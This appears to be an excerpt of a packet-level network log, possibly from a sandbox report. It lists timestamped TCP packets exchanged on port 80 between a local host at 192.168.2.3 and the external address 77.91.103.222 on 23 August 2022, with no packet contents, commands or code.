Aug 23, 2022 18:24:03.137384892 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137402058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137443066 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137444973 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137489080 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137514114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137522936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137655973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137665987 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137826920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137854099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137913942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137922049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.180876970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.180938005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.180964947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.180989981 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181015968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181026936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181037903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181040049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181066990 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181077957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181080103 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181092024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181118011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181144953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181152105 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181154013 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181155920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181169987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181195974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181222916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181230068 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181233883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181236029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181248903 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181276083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181301117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181308985 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181310892 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181313038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181327105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181354046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181387901 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181391954 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181394100 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181421995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181449890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181504011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181529999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181536913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181540966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181543112 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181576967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181603909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181628942 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181636095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181638956 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181641102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181653976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181680918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181706905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181715012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181719065 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181720972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181731939 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181757927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.181792021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181796074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.181797981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182058096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182085037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182106972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182154894 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182157993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182157993 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182159901 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182212114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182276011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182296991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182312012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182315111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182317019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182415962 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182580948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182612896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182653904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182657957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182658911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182682991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182701111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182758093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182763100 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182862043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182912111 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.182957888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.182981968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183007002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183031082 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183054924 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183056116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183059931 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183078051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183099985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183120012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183121920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183128119 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183140039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183144093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183167934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183176994 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183191061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183214903 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183233976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183237076 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183238983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183249950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183260918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183264971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183284044 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183305979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183324099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183327913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183327913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183372021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183372974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183397055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183419943 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183419943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183427095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183444977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183466911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183485031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183489084 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183490992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183501005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183504105 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183511972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183530092 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183533907 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183578014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183582067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183587074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183615923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183636904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183639050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183682919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183706999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183721066 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183725119 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183727026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183731079 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183757067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183779001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183785915 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183789968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183816910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183825016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183829069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183877945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183897972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183923006 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183945894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183970928 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.183976889 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.183980942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.184027910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.184099913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.226911068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.226946115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.226999998 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227009058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227010965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227035999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227056980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227088928 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227127075 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227159977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227163076 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227181911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227207899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227237940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227252960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227257013 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227258921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227261066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227281094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227302074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227320910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227324009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227325916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227328062 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227370024 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227374077 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227377892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227483034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227504969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227528095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227530956 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227534056 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227550030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227574110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227587938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227591038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227592945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227624893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227650881 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227674961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227679968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227683067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227700949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227725029 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227744102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227746964 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227750063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227751017 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227776051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227823019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227832079 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227835894 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227838039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227848053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227873087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227911949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227915049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227917910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227920055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.227952003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227973938 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.227994919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228018045 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228022099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228025913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228028059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228040934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228063107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228075981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228080034 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228081942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228085041 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228106976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228137970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228140116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228151083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228158951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228182077 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228209019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228219032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228223085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228230953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228266001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228287935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228300095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228311062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228338957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228339911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228343964 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228359938 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228380919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228399992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228420973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228420973 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228425026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228426933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228444099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228466034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228487015 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228497028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228502035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228503942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228509903 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228539944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228543997 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228552103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228554964 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228576899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228599072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228621960 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228622913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228626966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228645086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228667974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228683949 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228687048 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228692055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228708982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228727102 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228745937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228765965 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228785038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228810072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228830099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228856087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228879929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228898048 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228904009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228905916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228912115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228929043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228950024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228950977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228954077 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.228972912 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.228996992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229012966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229017019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229018927 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229021072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229044914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229063988 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229067087 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229068995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229094028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229118109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229119062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229123116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229145050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229181051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229187012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229191065 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229208946 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229238033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229255915 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229259014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229260921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229263067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229285002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229306936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229307890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.229332924 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229355097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.229377985 CEST	80	49844	77.91.103.222	192.168.2.3
